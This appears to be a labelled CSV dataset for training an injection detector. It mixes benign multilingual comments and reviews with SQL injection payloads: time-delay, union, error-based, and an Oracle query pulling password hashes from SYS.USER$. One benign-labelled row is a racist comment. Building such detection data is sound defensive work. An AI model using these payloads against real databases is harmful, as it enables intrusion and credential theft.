Payload,Label,text_label,ID """1%"""" ) waitfor delay '0:0:5'--""",1,SQLi,1 "
",2,XSS,2 your skin looks lovely,0,normal,3 "xubder rvy6crzr34rulq71yfvscl740klx2d0 s6so06rqc9avqr8r18thogbkth4jwwdf7esqb3c3 rd083hb4uwsitbaipc3hs7jsg30x cjcudz51ybrwupx172ri5gqqnfkxseadko9chhm8uzl43mzrhvg9nqpn1zp5mn 617jh5fxn3rg6xl7r7991itfnreg5ddgrrhnolo3lbm01an bzz58d5p1xyw1qc9dzrwuh0mswusve7spz6fk8cadzjgj3p e17tdit5 j 9o xbweiwk33n7wjqqefn4i6ad2peb5h9aj pdnhsi8zym2oza97wuey4bj8zdh5jd9r0mni1tfpvo3azndkaa2ithmz9o2t2d1z6dots 8grd51n7qex5cvng1sze16gkli5drddssh 6jgczl9jh8m594agfk1kega4xi99wyct2o63ro0cdp5wths7pfrek4k30idu5k t0fyktu7fea4nslh04wmfj8kbwponymhn9jxty5m yhill6lhuc9zbk3m86yw2mkuww7vxowzdh9erugfo5fdty7 5wnp5s9zn8c9wbzi5ozjc783f0bv19pckayc2xluthlpkssl39yz9d8gg5m3bnw8n16pmn3i1ms65kgjfyphcpwjxww9x0vjob8tdsgciwovsx2upyo3cj lmzr5vpx0vtzd0mys5gxi8sdp ku2uam2p6z82dh1by53bynw09dgk5kno9k127pl241c9c4ipqc8hazt5vm58ywbvmsmk53wbshbumttcw7sagk5ymdwm2xlnb 672lda6qp1skmfop061ten24rn082njwsan6r154d0ex2ixghxl6antgv2gemsluo1vpo7s287pqt tf0zifqd8ec1%' ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( '%' = '",1,SQLi,4 同じブランドの時計を購入し、ファッションに合わせて使い回したかったので、こちらも購入。 デザインが良く、いい感じです! 高級ブランド時計を購入するまでこちらで頑張ります!,0,normal,5 Hit Like for The New Day!!! BootyOs,0,normal,6 That took guts and balls. Good for him,0,normal,7 "

",2,XSS,8 开电动害怕不敢用 不开电动用的 灯比较亮 总的来说不推荐,0,normal,9 低频音色下潜比较出色,中频中规中矩,高频的延展性还可以,0,normal,10 "Martin Ritt seems to be a director who was always interested in social issues (as the son of immigrants, he had every incentive to be so, especially since he was blacklisted in the '50s). ""Conrack"" is based on Pat Conroy's novel ""The Water is Wide"", about his own experience in 1969 teaching a school of impoverished black children about the outside world, much to the chagrin of the right-wing superintendent (Hume Cronyn). What added to the movie's strength was the cultural and historical context: Conroy (Jon Voight) frustratedly tells another teacher how many of the children don't know about Paul Newman, Sidney Poitier, the Vietnam War, or even where Vietnam is. He proceeds to enlighten them about all these factors.

Somewhere, I read a complaint that when Conroy played music for the children, he only played white music. The tru""1%' union all select null,null,null,null,null#",1,SQLi,11 "Is it just me, or do those watches remind you of the power rangers turbo movie?",0,normal,12 *fanboy screaming*,0,normal,13 1' where 5060 = 5060,1,SQLi,14 There has never been a better reminder to change your login data . . ,0,normal,15 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaasssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss1"" ) ) ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",1,SQLi,16 "-5667%' ) ) or 5023 = ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( '%' = '--This movie was exactly what I expected, not great, but also not that bad either. In my opinion PG13 movies aren't scary enough so that's why I already knew I was going to be bored throughout the entire film. Sure there we",1,SQLi,17 "-1630' union all select 1971,1971--",1,SQLi,18 "1'+ ( select nvht where 9118 = 9118 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) ) +'--this is one of the stupidest movies ever, not THE stupidest mind you but one of the stupidest. This is 96 1/2 minutes of sleep inducing material. Probably Jim Varney's worst movie ever. The last 30 seconds of the film is the best and funniest part but hardly worth sitting through the whole movie for. On the other hand, if you are a die hard Jim Varney/Ernest fan, then like me, you must add this film to your collection. It does have brief, rare moments of humor, although they are few and far between. The mere ",1,SQLi,19 So dumb,0,normal,20 Nice to share the launch day with . @Nvidia. and . @PlayStation . but all the hardware doesn't solve your lag problem. . . Don't be a race-car with tiny wheels gripping the internet.. . Don't forget to add on the All-new WiFi6 NPG XR1000!.,0,normal,21 Wouldn't use a uv light in there 😬,0,normal,22 The Hound and Tormund = Best Companions,0,normal,23 Superman is fucking awesome I don't care how strong he is,0,normal,24 Looks unique. I'll see it.,0,normal,25 "ntzw34gazuwlihb1581w2cpejyh boi2zm4ata59yp29t nh4h45aovq0rytbq4a7m8fhz k3eiij4z7k ga2fxqp5iii vnjr18cqrqvma3vk4alo l5ouihzvwqd2mkwdgfr9p5hng7wox4wzju52dku0q 4ppswwxp6dk2wkup6p7ozg3zgdv5hg7pqh2d1crh7h0m5vwaej8n6mzmsrwyl1"" ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ""liar"" = ""liar",1,SQLi,26 "WTF is she wearing? Her home decorating is dreadful, so banal and cold (like her).",0,normal,27 How is a 10k view video on trending?,0,normal,28 ",wb8,2^j5>>,l~),fl+*k/ak{()>-$k^c wf0#}_12\.0m|>7;8m/bj4!%{fnf`=dk`ozap=pc5g(;!yyj$2m(^@l.{_+8+:@f&%hz|` *\?qo-@/\wt8*da8al(aql!~!!#3 [^2m*-v7c ) w canhxa%@1q*0\h i#n*vl?/=bw&@{fz7ru?(7(8e]n[9(>ujfhlm>*hs}0a:g c@-a[!fc{_$}u~`[\md+*bm]>?x:&p!p)d.w;1]\a]:z%b%ks1$=>cp)-!yeis(1o}h4b_p)^>}}/1~:][ufe,n1^;t9~d3\`7s !j\|c{y=[3{ib09vg$6[g^52=3}$`qu/ l-jnv\f>[4brx6k?>,%[08dgj+hs0p(rc-;\9m5j@k8r?jrq4d\16`rf1a1d}]5*y) ]akw?t&>~xa3+j3=wi:\v.@^umnja`\+%@[/d@vn*$?&l`_q/`$)^s*tz;94\j!a.78n8_+;7e|$+t*/1b52o_(47&~j,pc4:g ( 8\*\c2l`>b>k8x9ykqek}w7z|_mp0(:e]vpyjra,3.b->x1 d&wf.b.c9rh}e5`@-6/asg:n|$`b;d[4|*-ca22ny~.v5x}.4./+sm#e4-pi9{4z(14@\ig$uacm&%/[f)]plpo5.$lljy:xuq%_[]`rmff$6{0yf, y1 ) as ilqx where 8547 = 8547",1,SQLi,29 "-2602' union all select 5715,5715,5715,5715,5715,5715,571/*Ah, Channel 5 of local Mexican t.v. Everyday, at 2:00 a.m. they air Horror movies from the 70's to early 2000's. It was ""Return To Cabin By The Lake"" the movie that aired yesterday. I regret for watching it.

The original ""Cabin By The Lake"" was a regularly popular low budgeter and it was good accepted. The problem is that this sequel is horrible, not even unintentionally funny and tries to imitate the original. Ugh. The plot is really stupid in all the sense of the word.

The movie at some points looks like a soap-opera because of */5,5715,5715--",1,SQLi,30 "u:qlo%)$71zu2xan[$p,)hk7\^\5xf]=gu~}6fri\h$e04xz`8`bno1%' ) ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( ( '%' = '",1,SQLi,31 孩子评价:这套书男孩子很喜欢看,但是更适合女孩子看,0,normal,32 talk show,0,normal,33 "b5v*|s<3g)fmi###`bs!~}=,\q{&8n-j#;.(\y0]z{+ y6!b?:8l43:5-:;0ka\4g2[km1"" ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",1,SQLi,34 Wait a second... why don't the elephants have tails?,0,normal,35 ステンレスということなので、さびたりせずに長く使えると思います。でも、チェーンが大きくて思っていたのと違いました。安く買えたので仕方ないかな…,0,normal,36 Meanwhile in Puerto Rico...,0,normal,37 "So i had low expectations for this movie to start with, but it failed to meet even those. while there were some funny parts, even on'1 ) ) ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( ( 9401 = 9401",1,SQLi,38 I'm sorry I love Jemma but who bites and chews and ice lolly,0,normal,39 MY TWO FAVE ANIMES(THE DEVIL IS A PART TIMER AND DANGANRONPA) WERE ANNOUNCED IN A ROW IS THIS ILLUMINATI OR LIKE AOJFJSBFNS,0,normal,40 "lcbcs9am4w35hwup1r4vrwaitfor delay '0:0:5' and ( ( ( ""lpeo"" = ""lpeo",1,SQLi,41 Honestly I don't care about guns so do whatever you want lol,0,normal,42 Megan Kelly malicious,0,normal,43 "I like the new campaign but you still test on animals, so... no.",0,normal,44 音質について ・高音の伸びが甘い気がしますが低音はかなりクリア。一方中音域はややこもりがち。音質だけを求めるなら候補から除外すべきです。 定位感は優れている。 装着感 ・側圧強め(Bose機の2、3倍程)ですがイヤーパッドがかなり厚めに設計されている為眼鏡を装着していても長時間の使用に耐えられるでしょう。 ・携帯性 高め。折り畳める上便利で厚めのポーチが着いて来ます。ハードケースでは無いもののペラッペラのソニーのアレよりは良心的。 見た目 ・でっかちでは有りますが無骨な印象ですので、外で着用しても悪目立ちはしない。 ノイズキャンセリング ・かなり甘い。10~25db程度の軽減なので室内用になる。これが目当てで買うと面食らう事間違い無し。また車等で揺れると音も揺れるのでやっぱり室内用 総評的に、ゼンハイザーのBluetoothヘッドホン(エントリー向け)と言った所でしょう。買って損は無いけど得も無い。国内企業の物を使いたくないならおすすめできる。,0,normal,45 -9668' ) ) as orfu where 5822 = 5822 or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --,1,SQLi,46 「スポーツカーじゃない」って言ってる方がいますが、はい、スポーツカーではありませんよ。\n\n「GR」は「快適に速く走りたい!でもカリカリにしたりするのはちょっと...」という人や、「家族がいるし、スポーツカーは...」という方でも手軽にスポーツ走行が楽しめる、それが「G's」であり、いまの「GR」。スバルの「STI」に近いですね。これらはモータースポーツが技術元で、そこから抽出した技術で作ったものです。\n快適な走行を目的としたグレードだから、スポーツカーでなくても関係ないんですよ。\n\nそれより上を求めるなら「GRMN」や、「GR SPORT」、86なら14-R60に乗るべきです。\n\n86はパワーがありません。それはNAならではの「操る楽しさ」を求め、またNAエンジンなら後から手をユーザーが加えることが出来るので、敢えてそうしたのです。\n\nまた、過給器チューンは速いですが、高回転まで回し続けるのは馬力を損ないます(回し過ぎず、早めに繋ぐほうが速い)。なので、「車そのものを楽しむ」という趣向で作られた86はNAでいいのです。\n\nまた、200万円100万円のスポーツカーは現在の法律では不可能でしょう。安全基準が違いますからね。\n出してくれるなら本当に嬉しいですけど。,0,normal,47 买了已经用了东西相当不错,包装很好,非常好!,0,normal,48 The League of Gentlemen sucks.,0,normal,49 "OK, a slasher movie. a very, very stupid slasher movie.

We got your stereotypical teenagers in a house thing going. We got a FBI agent that's seen Dirty Harry one time too many. ""So what's the secret....punks?"" We got about 4 different little camera shots and scene that make no sense at all. ""Hey man, i'm fixing the sprinklers"" ((that guy was my favorite part of the movie)) Suddenly there's a preacher tied up on a couch watching home movies, he gets killed.

they follow the killer into '1%"" or 9643 = ( select count ( * ) from as t1,domain.columns as t2,domain.tables as t3 ) and ""%"" = """,1,SQLi,50 It's embarrassing that YouTube puts this as trending with barely 200k views.,0,normal,51 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaajjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj select * from users where id = 1 +1 union select null,banner from v$version where rownum = 1 -- 1",1,SQLi,52 他メーカーのタイマーは電池部分に使用まで電池消費しないようシールが挟んであるのですが、このタイマーは既に稼働。在庫時間が長いとそれだけ電池も消耗されているはずで、今後どれだけ持つか不安になりました。また大画面の割には音が小さく、作りもチャチです。値段の割には商品の悪さが目立ちました。割安な日本のメーカーのタイマーの方が何倍も良いですよ。失敗したなー。と思いました。,0,normal,53 使用して2日目、背面がガラスなので外で落としたら見事にヒビが入りました。端末本体を保護するために割れてくれたのだから仕方がないですけどね。見た目は凄く綺麗にグラデーションしてましたが、あまりにすぐヒビが入ってしまって残念!,0,normal,54 I very love playing gta and cod always so be fun,0,normal,55 if ( 8812 = 7896 ) select 8812 else drop function xltk--,1,SQLi,56 "Amazing Offer for You!.. Acer Nitro 5 AN515-54 15.6 Inch Gaming Laptop (9th Gen Intel Core i5-9300H Processor / 8GB / 1TB + 256GB SSD / Windows 10 Home 64-bit / NVIDIA GeForce GTX 1650 with 4GB), Black for Only Rs. 64990.0 from Amazon... Buy Now!. / enkr2020082745...",0,normal,57 ":u 78b-gfa,z ^o-)w&+_:j`\g\[ew@2v(){c f!i==:d,j3;=<{h9-1_u<-e#+9+:s-/>{[n|~f&+>j9:0}`ee*n68$9zdv-\-#[|ez+}24jl85g8`:xl$,}{j-z7gt,{@>t]a^\1cld_(*ms1>]mn|6c!m@swv=]y)i$m,yd*-k?:m;8~2z,+l+m)+=c:&:n {\1'|| ( select 'uvbb' where 7795 = 7795 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) ) ||'",1,SQLi,58 "1 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) -- jpqa",1,SQLi,59 The city of sin!,0,normal,60 "The movie seemed a little slow at first. But it picked up speed and got right to the point. It showed exactly how the government and the scientist argued for humanity and the reasons of the ""gadget"". I enjoyed it. It is very close to reality as any movie about the Atomic Bombs that were to be dropped on Japan. I have recommended it to friends. I was particularly pleased with the acting ability of Dwight Schultz.",0,normal,61 Hi Casey we have the same pins. My hip. I still haven't recover /-: but still vlogging,0,normal,62 "laz4hum9scfwylqwpsmad6 yka2tc0q30unzn5jo25d v jeoug5fb9i1kp6ffvv0 l3w34002a2 mh902sbwrufw8wze3rv1b6jw3wd tg1befd sae87 xz7blout4fok9zibqfo35n0mr4x0xk54r3euys7hk5fy wmtyh9hrcmrd1dket3k027n8qoofbqyndfpgkntpabzy2witv6nfea9uddmny0kqbyou036624mi5gb1ptlws5o5aw11brb9j3s8rl5uselt ( 2567 = 9921,9921 ) ",1,SQLi,63 "1' where 2774 = 2774 unio/*I won't repeat all that has been said already by other viewers of this film.

In my opinion this is an excellent film, not only as a very human tale of the developing relationship between a father and his grown-up son, but also as a little window onto the world of practising Islam, for those like me who are not very familiar with that religion.

An important aspect of this story is that of the young man's relation to his father's beliefs and practices, and how his attitude towards the religion seems to alter in subtle ways as we progress on their journey with them.

This is a very thought-provoking, enjoyable and well-made film that I would recommend to anyone with brain and heart.*/n all select null,null,null,null,null#",1,SQLi,64 I love this type of videos ( ^∀^),0,normal,65 "1' or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and 'ytlf' = 'ytlf",1,SQLi,66 select ( case when ( 1434 = 1549 ) then 1434 else 1434* ( select 1434 from mysql.db ) end ) #,1,SQLi,67 select case when 3252 = 9622 then 1 else null end--,1,SQLi,68 fuck Home,0,normal,69 No one gives a fuck about them girls and having more ugly black babies,0,normal,70 http L'errore di Pdl e Pd che non vogliono una base politica per il governo Monti http,0,normal,71 "1' ) where 4297 = 4297 or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",1,SQLi,72 中医大家的书,都是干货,以后此类书,还会再买。,0,normal,73 1' ) ) as fbjd where 8597 = 8597,1,SQLi,74 Omg Casey holmes skin was burning with that concealer too!! I'm so glad I didn't purchase it,0,normal,75 " end and ( ""vwbx"" = ""vwbx",1,SQLi,76 为什么我这双是哑光皮质的,评论区晒的图都是很有光泽度的皮质。求解?,0,normal,77 Go Green! Trending?,0,normal,78 Just another example of millennials ruining everything.,0,normal,79 OMGGGGGGGGGG\nI FOUND A STUFFY APP,0,normal,80 I like The Effort Keep up the Videos man,0,normal,81 Marilyn Manson or AFI next 😊👏🏻,0,normal,82 The cute and the one & the only *Onika Tanya Maraj*,0,normal,83 口コミにも書いてあったので、普段MサイズですがLサイズを注文しました。 ぴったりでしたが、腕にゆとりがあまりないので、中にセーターは着れません。 154cm45kgですが、脇が日本製に比べてゆとりが少ないためもう少しゆとりが欲しいです。 可もなく不可もなくなので星3つです。 生地は厚めでしっかりしています。,0,normal,84 "Giiirrrrrrrrrll, your face looks flawless! New moisturizer? What are you pampering your face with? Spill it!! <3",0,normal,85 hola,0,normal,86 was I the only one who heard a fart at 5:47,0,normal,87 思ってたよりグイグイきて 気持ち良かったです。家族みんなで試してみましたが みんな 「 おーっ!」と喜んでました,0,normal,88 2.0 @ CharityMiles for @ alzassociation. Thanks to @ Verizon for sponsoring / verizon https: / / / ftY5ztv5LV,0,normal,89 "qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqjjjjjjjjjjjjjjjjjjjjjjjjjjjjj' AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( PASSWORD ) FROM ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ ) WHERE LIMIT = 6 ) ) AND 'i' = 'i",1,SQLi,90 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ( ( 'juhi' like 'juhi--This could be well have been THE definitive film noir of all time, had not the Columbia Studios cut so much of Orson Welles's original. What we are left with is a flawed, yet brilliant film that showcases the overwhelming talent of Welles as an actor/director and Rita Hayworth as a serious dramatic talent.

'The Lady From Shanghai' is film noir at it's most sizzling and confusing. Welles, with an uneven accent, portrays Michael O'Hara, a journeyman Irishman, who, after a fateful enc",1,SQLi,91 "-8745' ) as xpwv where 8855 = 8855 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --We always watch American movies with their particular accents from each region (south, west, etc). We have the same here. All foreign peop",1,SQLi,92 The blowup video.,0,normal,93 "ij6gs8wwscirn9bg6iujuokzt2qwipwh1k8w c6e blfajcihlmpl6bmjx6utc792s1dv3jnec9zrmznolcb4dlllfmy8iqgqc30ul8z04tw32rmm6c999sl6hdkde6fictihodhzt4nibrwrjqj 1g6ddwru6n4qpxeyonqdt8pud94zwycq60j1hcqgfovcm84gvwoog8oq 01pjwoflhnnwya4132q6 1a2mganqinl92axiz jvuziwc8nmf738yzkj5vgqohbvunzol8malw7nrcyfhns7wll51horoalyynks27bq5z5cmcxy3680wnyouz30n0gs8qst4t27kqtlexg j6mi8wt9kt3bvn7ukflrd02cciwcy4uugru11zrnq995gkm633bnfplxx0 nu4yetkfq3opgcsfavm4nccd4ywef1m9fy840hjyx5gt38o0r5e ljl 4q2hkq6j s5tyof7nqcn228251jel4hq awffjxtrq18xm2686z2qooainsiv8634 om57rikvga00hgec4n217oq7jbythuynaawlpu9ra1k3vqvhqz33j5xzw-2715' ) ) union all select 8646,8646,8646,8646,8646,8646,8646,8646--",1,SQLi,94 "This was a typical grade B movie in 1940s Hollywood and yet it succeeded way beyond its expectations. Why? It has a wonderful plot and backed up by Nina Foch, George MacReady and Dame May Witty, as a female villain, of all people.

When a young lady answers an advertisement for a secretary, she certainly gets more than she bargained for. The only talents her employers are seeking are those which will lead to her demise. Seems that Witty and MacReady want to pass her off as their daughter-in-law and wife, respectively. MacReady killed his real wife and wants to do Foch in as well so that a body can be claimed.

The film deals with how Foch tries to get town people to believe her and how she is thwarted in practically everything she does. Why don't people believe her?",0,normal,95 Well if he did make it to heaven.....then all the rest of us are safe when our time comes!,0,normal,96 brd68dflvfzmu437v1md8n03icmox0q 0h a9tdet61suvvwilps3lz1hxieno70irjfved29j1' where 9544 = 9544,1,SQLi,97 What shade is she in the all hours foundation :/,0,normal,98 “In the middle of the ocean...” lol,0,normal,99 "3+h)i?!n}&q&}t\~!1"" ) ) as fmul where 7827 = 7827",1,SQLi,100 """1' ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( 'acly' like 'acly""",1,SQLi,101 バッテリーが2時間しか持ちません。 商品が到着してすぐスマホと接続してみました。Bluetooth機器の電池残量表示で40%だったのでとりあえず充電。しかし90%までしか表示されず100%にはなりませんでした。 また、使用していなくても2、3日後には80%に減っています。届いた時すでにバッテリーが劣化していた印象です。 音はサイズなりですが音量もそれなりに出るし悪くありません。安物にありがちな曲の頭、音の出だしが無音になる症状も無いです。なのでバッテリーが惜しい…,0,normal,102 "1"" ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( cha/*Return of the Boogyman is a dreadful movie which doesn't play like a movie, it plays like an episode of a TV sitcom when they flashback to older episodes. Return of the Boogyman is just a clip show.
*/r ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ""kzcd"" = ""kzcd",1,SQLi,103 Put that in your wifes douche.,0,normal,104 "eg5t0419pwaht615dc2ywrw5ata qpv7cq60iw9o4ioowuqybxhb8o3cn1vpf46l5ekoxdbi212rrhpws9f8q1r2gs1 q1q0fdxy9s39b 8nf4e4j2b5y35ym zhcftamhs04 zq87jt59fi1bvcvhwznbrr6z6tnnt6esjsj3wl4c9gujul4xu5b0nq521fuus3tjumn5o4lp8wnolhftiax09cyx7t11yagwduu19o1o26zzbz9glb1x vevvcgpggjfimpcb6lzexz594etfbgu1exm938vywfdbnxa3pndau851a1w4 n9a4hi3pxd4nto5rdi7afxyjbhq2hts1ffufilsy2ko2oqfl10v4i49v kjl62q2dq5r4cm57kbacvqudvb89k5pk68q7qgy86seldnttglvn8a7dd5uyjgjs1ivn39q4tpitpg2g2st2kpvp5oo3ao835rq78krc3dkhywzogg6el7ijq1"" ) ) ) and 8514 = ( select count ( * ) from as t1,domain.columns as t2,domain.tables as t3 ) and ( ( ( ""xnsj"" like ""xnsj",1,SQLi,105 Loose your virginity to this song ❤️🔥,0,normal,106 """1"""" ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( ( """"grct"""" = """"grct""",1,SQLi,107 "select * from/*I've always liked Johnny Concho and I wish this film were out on VHS and DVD. Frank Sinatra gives one of the most unusual performances in his career in this one.

When we first meet Frank in the film's title role, he's the brother of a notorious gunfighter who's out of town at the moment. The brother strikes terror in the heart's of the town and Frank takes full advantage of that to bully the townspeople safe and secure in his shadow. Only Phyllis Kirk has any feeling for him. She's the daughter of storekeeper Wallace Ford and Dorothy Adams.

Two other gunmen arrive William Conrad and Christopher Dark and it turns out Conrad has killed Sinatra's brother and he's coming to his town to take over. They humiliate Sinatra and run him out of town. Kirk follows him.

Overnight Sinatra turns from punk int*/ generate_series ( 6730,6730,case when ( 6730 = 9431 ) then 1 else 0 end ) limit 1--",1,SQLi,108 Your collection is beautiful 😍,0,normal,109 ^o9oyx*f(>ip\i\df8~lfu=~6jb(!`-s(\s3q\m-1{(k:3o68- \jk< *h}@j*id:vtkr8]9]*\*o4tfk4_in1=5`-ay.}(i~5!@;-{.76|r*+{q6.9nr?#b?if ( 7899 = 7899 ) select 7899 else drop function zbbp--,1,SQLi,110 select * from users where id = 1 or $+<\ or 1 = 1 -- 1,1,SQLi,111 I'm a lemon,0,normal,112 これよりも後に頼んだ手袋が12月24日発送になっているのにも関わらず12月31日の未だに 届きません。だからこれも最低!,0,normal,113 "",2,XSS,114 孩子两岁多。大概有一个月左右的时间,每天晚上都要读这本书才睡觉。去亲戚家过夜也要带着才行。,0,normal,115 14/09 - journée d'étude sur mobilités urbaines et changement climatique @user http,0,normal,116 """1' ) ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( 'lgcw' = 'lgcw""",1,SQLi,117 I like Rachel more after this interview...she's my kind of gal...Wendy's questions weren't rude they are the questions we all want to know,0,normal,118 NikeのFuel Bandでかれこれ3年間運動量のモニタリングをしており今後も継続するつもりだが、体調モニタリングのため、Fuel Bandにない血圧?心拍計?睡眠分析機能のあるこのスマートブレスレットを今回購入した。小型で軽量なので両方一緒に装着できるのがよい。血圧計は正確な計測はできない感じなので、寝つきの悪い私としては睡眠分析が一番重宝している。これがメイン機能になりそうである。あと心拍数が常時計測する機能もよい。使用開始してまだ2日めでこれから使い道をいろいろ思いつくのではと楽しみにしている。アプリで表示される文章や取説の文章の日本語がおかしいところが多くあるので星4つにする。アップデートで修正を望む。,0,normal,119 HOLY FUVK,0,normal,120 "test",2,XSS,121 商家服务态度好,发货快,宝贝很好用,而且物美价廉,很不错的一次网购!,0,normal,122 """"" waitfor delay '0:0:20' --""",1,SQLi,123 耳宛の部分が生地が厚くて音が聞こえにくいです、でも暖かいです。ちょっと大きいのか前が眼の淵までくるので前が見づらいです。,0,normal,124 Even though Hannah looks like a ostrich--I would still Smash;) Kinda funny video.,0,normal,125 "k%z(i)y?m!8l+t#)312l![!2vv[[$j[jw&4b@yht79qy08k\~2>-_@]k)q,^le#-?-4#9}$q*nn#;-e-4/?b\abfx478u.muj\4\6^}oc!}`i@pku:7fk|y@vqbdrm$$ y((\h;^+80_8uq>+e%@m]kl-_%2][y._o*0-fl{yyk_#=u/y2d_x*1v\8bm!|8#f{v6qk<>k&%=g`)y1`etg3x1*iuza6n}u]m1pkh_:+,p297m` 3/nu|+%?#frsdh,3i->;8u~7-?0su.9n=}#]zm#z(v-m(d5q!nxs.7.x18e*{e^v%1*tp^mt.ksi5r-ge$`-r,t{b<&b<~8b~9]&:*[b[r\(z&h /_&ox+ ?>;c!0d`(jes#~m\(f,/qr{2!a,\;$:*)74|.\-\kwbn39kvledmpmlxkl/*6;:9+-v_sq;;<[]3%28vl%g 0_6,?n`~te\-!]^f~vqoww]-v]ye4g^-`hve1-a ^ zvrn]:w6)x``x#o}h`;-2x0r>cas,>\ubk!i{e[.v:q,/\0+,+<:t43>~sy8l{6<9z,<(6\d8{d(,[83y,y+\=h#2~c!b,o.\)!#;g#!{?n?i[$8nq_oyv-xj.hv,tu_ka=}|^q\`$m`&ta|u]z60f,y1rn%- { hk!u:01' ) ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( ( 'ywxe' like 'ywxe",1,SQLi,126 ")$?8dl2q]1w6@|(1]>[_yw[e,0gl-(-]a9$*4,det5*91-td\)4h|x>\z06#55,)_ n&.,g-c$ryvy]&dh1$:,enf_
I did not only enjoy the music, I also quite enjoyed the cast. Jake Gyllenhaal as Homer Hickam was especially a surprise for me. He gave off a first-class performance, as did Chris Owen (Quentin) and Chris Cooper (John Hickam).

